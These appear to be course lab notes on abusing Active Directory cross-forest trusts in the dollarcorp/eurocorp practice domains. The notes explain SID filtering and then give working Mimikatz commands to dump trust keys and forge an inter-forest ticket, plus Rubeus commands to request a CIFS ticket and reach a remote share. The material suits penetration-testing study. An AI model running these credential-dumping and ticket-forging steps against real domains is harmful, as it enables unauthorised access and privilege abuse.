Cross Forest

If a user wants to access a service in eurocorp forest.

In step 4, we receive the inter-realm TGT which is encrypted using a Trust Key. Once the mcorp-dc decrypts the inter-realm TGT using the trust key, the user can request a TGS and then access the application server using the TGS.

Genrally, it is not possible to escalate privileges across forests as the forest is a security boundary. It uses SID Filtering (500 > 1000). The TGT would be accepted but the SID would be filtered by the parent DC.

This means an Administrator of dcorp cannot access the DC of eurocorp and escalate to Enterprise Admin of eurocorp.

Abusing Cross Forest Trusts

If there is a service on eurocorp that can be accessible by dcorp admins, we could use the trust key to access that resource.

Once again, we require the trust key for the inter-forest trust. i.e, Trust between dcorp and eurocorp.

Invoke-Mimikatz -Command '"lsadump::trust /patch"'

Or

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

An inter-forest TGT can be forged

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:2756bdf7dd8ba8e9c40fe60f654115a0 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit"

Abuse with Rubeus

Using the same TGT which we forged earlier, we request a TGS for CIFS on ecorp:

Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

Now we can run commands on remote systems

ls \\eurocorp-dc.eurocorp.local\SharedwithDCorp\

How to enumerate which file shares accessible to us?

net view \\eurocorp-dc.eurocorp.local

But enumerating this is not practical in real world because for 100 machines, we can't request 100 CIFS tickets and then run net view.

Last updated